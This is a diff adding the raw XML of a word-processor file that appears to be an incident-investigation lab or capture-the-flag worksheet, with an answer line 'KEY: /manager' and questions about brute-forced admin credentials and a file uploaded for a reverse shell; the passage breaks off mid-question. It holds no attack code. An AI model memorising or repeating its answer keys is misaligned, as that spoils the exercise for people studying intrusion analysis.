+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="3087370"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="111CBC11" wp14:editId="56079F74">
+            <wp:extent cx="5943600" cy="5262245"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="1457169012" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1457169012" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId11"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="5262245"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>KEY: /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>manager</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Top of Form</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Bottom of Form</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Q6</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>After</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>accessing</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the admin </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>panel</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>attacker</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>brute-forced</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>login</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>What</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>credentials</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>did</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>attacker</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>successfully</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>use</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>? (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Provide</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>them</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> in </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>username:password</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>format</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Top of Form</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Bottom of Form</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Q7</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Once</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>inside</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the admin </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>panel</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>attacker</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>attempted</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> to </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>upload</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>file</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>with</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>intent</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>of</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>establishing</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>reverse</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>shell</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. Can </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>you</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>identify</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>name</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>of</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>this</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>malicious</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
